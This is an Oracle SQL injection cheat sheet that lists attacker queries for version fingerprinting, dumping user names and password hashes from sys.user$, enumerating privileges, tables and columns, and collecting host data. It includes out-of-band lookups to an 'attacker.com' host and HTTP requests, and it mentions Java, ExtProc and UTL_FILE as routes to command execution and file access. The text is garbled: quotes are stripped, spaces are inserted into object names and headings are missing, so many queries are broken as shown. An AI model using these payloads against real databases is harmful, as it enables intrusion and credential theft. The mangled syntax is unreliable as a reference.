Oracle SQL Injection Cheat Sheet

SELECT banner FROM v $ version WHERE banner like tns %;
SELECT version FROM v $ instance;


SELECT name FROM sys. user $; -- priv
SELECT name, spare4 FROM sys. user $ -- priv, 11g
SELECT * FROM dba_sys_privs WHERE grantee = DBSNMP; -- priv, list a users privs
SELECT grantee FROM dba_sys_privs WHERE privilege = select any dictionary; -- priv, find users with a special priv

SELECT name FROM v $ database;
SELECT instance_name FROM v $ instance
-- Also query TNS listener for other databases. See tnscmd (services | status ).
SELECT column_name FROM all_tab_columns WHERE table_name = blah and owner = foo;
SELECT owner, table_name FROM all_tables;



SELECT bitand (6, 1) FROM dual; -- returns0


Select cast (1 AS int) FROM dual;


Select case when 1 = 2 THEN 1 ELSE 2 end from dual; -- returns 2

SELECT UTL_INADDR.get_host_name (10.0.0.1) FROM dual; -- if reverse looks are slow
SELECT UTL_INADDR.get_host_address (blah.attacker.com) FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST (http://google.com) FROM dual; -- if outbound TCP is filtered/slow
SELECT UTL_HTTP.REQUEST (http://google.com) FROM dual;
Java can be used to execute commands if its installed.
ExtProc can sometimes be used too, though it normally failed for me .:-(
UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v $ parameter2 WHERE name = utl_file_dir;
Java can be used to read and write files if its installed (it is not available in Oracle Express ).
SELECT host_name FROM v $ instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name (10.0.0.1) FROM dual; -- gets hostnames